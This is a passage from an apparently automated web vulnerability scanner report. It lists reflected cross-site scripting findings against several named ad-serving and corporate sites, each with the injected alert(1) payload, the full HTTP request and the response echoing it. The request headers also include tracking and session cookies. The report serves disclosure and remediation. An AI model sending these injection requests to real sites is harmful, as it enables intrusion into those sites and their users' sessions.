Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:15:34 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8886
Date: Sat, 17 Sep 2011 01:10:45 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:25 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518f7071";alert(1)//58147849e4a";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538518f7071";alert(1)//58147849e4a";var ct="106142";var cf="300X250";var cn="
...[SNIP]...

4.188. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b020f"%3balert(1)//b8146ce1d6d was submitted in the cwpnet parameter. This input was echoed as b020f";alert(1)//b8146ce1d6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538518&cwwidth=300&cwheight=250&cwpnet=1b020f"%3balert(1)//b8146ce1d6d&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:15:34 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:10:53 GMT
Content-Length: 8858
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:33 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538518";var ct="106142";var cf="300X250";var cn="1b020f";alert(1)//b8146ce1d6d";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...

4.189. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58bc5"%3balert(1)//59676a2fd7c was submitted in the cwrun parameter. This input was echoed as 58bc5";alert(1)//59676a2fd7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=20058bc5"%3balert(1)//59676a2fd7c&cwadformat=300X250&cwpid=538518&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP207
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:12:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8858
Date: Sat, 17 Sep 2011 01:10:40 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:20 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWAD";var cr="20058bc5";alert(1)//59676a2fd7c";var cw="300";var ch="250";var cads="0";var cp="538518";var ct="106142";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase()
...[SNIP]...

4.190. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7aac"%3balert(1)//fdfffa7d22 was submitted in the cwtagid parameter. This input was echoed as b7aac";alert(1)//fdfffa7d22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538518&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106142b7aac"%3balert(1)//fdfffa7d22 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:08:12 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:10:55 GMT
Content-Length: 8884
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:35 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142b7aac";alert(1)//fdfffa7d22";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="538518";var ct="106142b7aac";alert(1)//fdfffa7d22";var cf="300X250";var cn="1";var epid="";var esi
...[SNIP]...

4.191. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60bd1"%3balert(1)//b7a914eb3d6 was submitted in the cwwidth parameter. This input was echoed as 60bd1";alert(1)//b7a914eb3d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538518&cwwidth=30060bd1"%3balert(1)//b7a914eb3d6&cwheight=250&cwpnet=1&cwtagid=106142 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Tue, 30 Aug 02011 12:08:12 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 8858
Date: Sat, 17 Sep 2011 01:10:48 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 03:57:28 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="538518";var cwtagid="106142";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="30060bd1";alert(1)//b7a914eb3d6";var ch="250";var cads="0";var cp="538518";var ct="106142";var cf="300X250";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.to
...[SNIP]...

4.192. http://tps31.doubleverify.com/visit.js [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps31.doubleverify.com
Path:   /visit.js

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa65b'%3balert(1)//5aa425efdd3 was submitted in the plc parameter. This input was echoed as aa65b';alert(1)//5aa425efdd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1001982&cmp=1001984&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=31&plc=1aa65b'%3balert(1)//5aa425efdd3&advid=672223&sid=1001983&btsvrreg=revsci&btreg=10288627&adid=&&num=1211&srcurl=http%3A%2F%2Fwww.tmz.com%2F&curl=&qpgid=&referrer=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: tps31.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:50:43 GMT
Connection: close

function obaCallback() { new OBACan({ "agncid": '1001982', "cmpid": '1001984', "plcid": '1aa65b';alert(1)//5aa425efdd3', "sid": '1001983' }, { "advName": 'Audience Science', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://www.audiencescience.com/adchoices', "advLogoURL": 'http://cdn.do
...[SNIP]...

4.193. http://tps31.doubleverify.com/visit.js [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tps31.doubleverify.com
Path:   /visit.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0dd6'%3balert(1)//e13ec5d8b55 was submitted in the sid parameter. This input was echoed as f0dd6';alert(1)//e13ec5d8b55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visit.js?ctx=1001982&cmp=1001984&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=31&plc=1&advid=672223&sid=1001983f0dd6'%3balert(1)//e13ec5d8b55&btsvrreg=revsci&btreg=10288627&adid=&&num=1211&srcurl=http%3A%2F%2Fwww.tmz.com%2F&curl=&qpgid=&referrer=http%3A%2F%2Fwww.tmz.com%2F HTTP/1.1
Host: tps31.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 00:50:48 GMT
Connection: close

function obaCallback() { new OBACan({ "agncid": '1001982', "cmpid": '1001984', "plcid": '1', "sid": '1001983f0dd6';alert(1)//e13ec5d8b55' }, { "advName": 'Audience Science', "advLink": 'http://www.doubleverify.com/PreferenceManager', "advPolicy": 'http://www.audiencescience.com/adchoices', "advLogoURL": 'http://cdn.doubleverify.com/oba
...[SNIP]...

4.194. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.pubmatic.com
Path:   /AdServer/AdDisplayTrackerServlet

Issue detail

The value of the clickData request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97827"><script>alert(1)</script>5c0fdad8f6a was submitted in the clickData parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/0197827"><script>alert(1)</script>5c0fdad8f6a HTTP/1.1
Host: track.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:38:40 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 180

<html> <meta http-equiv="refresh" content="0.5;url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/0197827"><script>alert(1)</script>5c0fdad8f6a" /> </html>

4.195. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://track.pubmatic.com
Path:   /AdServer/AdDisplayTrackerServlet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d06f3"><script>alert(1)</script>fd478c28e1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AdServer/AdDisplayTrackerServlet?clickData=wmoAAMNqAAA/WgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01&d06f3"><script>alert(1)</script>fd478c28e1e=1 HTTP/1.1
Host: track.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOwzAIheGrRMy1ZB4G7G5OG58mypap6t0L3f5P4okPidBzw.hij40EAYd2biEOEBtEDrzL4bWXNuFlTHuVudYce3XlZZTTPHZF9RT.ytIoU.mRLfK6zzPS8k.F8vcHhFgZ0Q--%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_27331=TMC; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; SYNCUPPIX_ON=YES; USCC=ONE; DPPIX_ON=YES; PMDTSHR=cat:; PUBMDCID=1; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:25 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 183

<html> <meta http-equiv="refresh" content="0.5;url=http://clk.atdmt.com/go/335787632/direct;wi.728;hi.90;ai.236941493;ct.1/01&d06f3"><script>alert(1)</script>fd478c28e1e=1" /> </html>

4.196. http://widgets.mobilelocalnews.com/ [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.mobilelocalnews.com
Path:   /

Issue detail

The value of the uid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2157c"><script>alert(1)</script>6ede9bee5e1 was submitted in the uid parameter. This input was echoed as 2157c\"><script>alert(1)</script>6ede9bee5e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?uid=42b39fdb198522d2bfc6b1f64cd983652157c"><script>alert(1)</script>6ede9bee5e1 HTTP/1.1
Host: widgets.mobilelocalnews.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/regional/view.bg?articleid=1366356&position=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:26 GMT
Server: Apache
X-Server-Name: doapp-www-06
Connection: close
Content-Type: text/html
Content-Length: 8345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title> M
...[SNIP]...
<input type="hidden" id="userid" name="userid" value="42b39fdb198522d2bfc6b1f64cd983652157c\"><script>alert(1)</script>6ede9bee5e1">
...[SNIP]...

4.197. http://www-01.ibm.com/support/docview.wss [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www-01.ibm.com
Path:   /support/docview.wss

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee43"%3balert(1)//c5b4f1caeae was submitted in the aid parameter. This input was echoed as 3ee43";alert(1)//c5b4f1caeae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/docview.wss?uid=swg27016186&aid=13ee43"%3balert(1)//c5b4f1caeae HTTP/1.1
